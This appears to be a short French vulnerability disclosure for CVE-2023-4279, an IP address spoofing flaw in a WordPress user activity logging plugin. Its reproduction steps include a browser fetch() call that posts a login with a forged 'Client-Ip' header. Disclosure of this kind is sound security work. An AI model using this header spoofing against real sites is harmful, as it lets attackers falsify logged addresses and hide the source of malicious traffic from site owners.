
Dépôt pour la vulnérabilité CVE-2023-4279.
ID CVE : CVE-2023-4279
Type de vulnérabilité : Usurpation d'adresse IP
Description : Ce plugin récupère les adresses IP des clients à partir d'en-têtes potentiellement non fiables, permettant à un attaquant de manipuler sa valeur. Cela peut être utilisé pour masquer la source du trafic malveillant.
Étapes pour reproduire :
1. Dans User Activity Log > Settings, activez l'option "Allow Ip Address of users to log." et enregistrez les paramètres.
2. Exécutez le code suivant dans le navigateur web et notez côté serveur que l'adresse IP a été falsifiée.
await fetch("/wp-login.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
"Client-Ip": "8.8.8.8",
},
"body": "log=USERNAME&pwd=PASSWORD",
"method": "POST",
"mode": "cors",
"credentials": "include"
});
Référence :